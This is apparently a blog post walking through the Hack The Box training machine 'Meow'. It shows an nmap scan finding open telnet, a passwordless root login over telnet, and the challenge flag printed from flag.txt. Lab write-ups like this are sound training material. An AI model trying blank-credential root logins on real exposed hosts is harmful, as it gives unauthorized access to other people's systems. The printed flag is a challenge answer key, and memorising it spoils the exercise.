Iklan saya

header ads

Meow Hackthebox

┌──(kalifulka㉿kali)-[~/Destop/HTB]
└─$ nmap -T4 10.129.38.62 

Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-11 14:33 +0700
Nmap scan report for 10.129.38.62
Host is up (0.26s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
23/tcp open  telnet

Nmap done: 1 IP address (1 host up) scanned in 23.20 seconds

┌──(kalifulka㉿kali)-[~/Destop/HTB]
└─$ telnet 10.129.38.62 

Trying 10.129.38.62...
Connected to 10.129.38.62.
Escape character is '^]'.

Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 11 Jun 2026 07:36:06 AM UTC

  System load:           0.03
  Usage of /:              41.7% of 7.75GB
  Memory usage:       4%
  Swap usage:           0%
  Processes:              145
  Users logged in:     0
  IPv4 address for eth0: 10.129.38.62
  IPv6 address for eth0: dead:beef::a0de:adff:fe42:8269

 *Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

 https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~# ls
flag.txt  snap
root@Meow:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19
root@Meow:~# exit
logout
Connection closed by foreign host.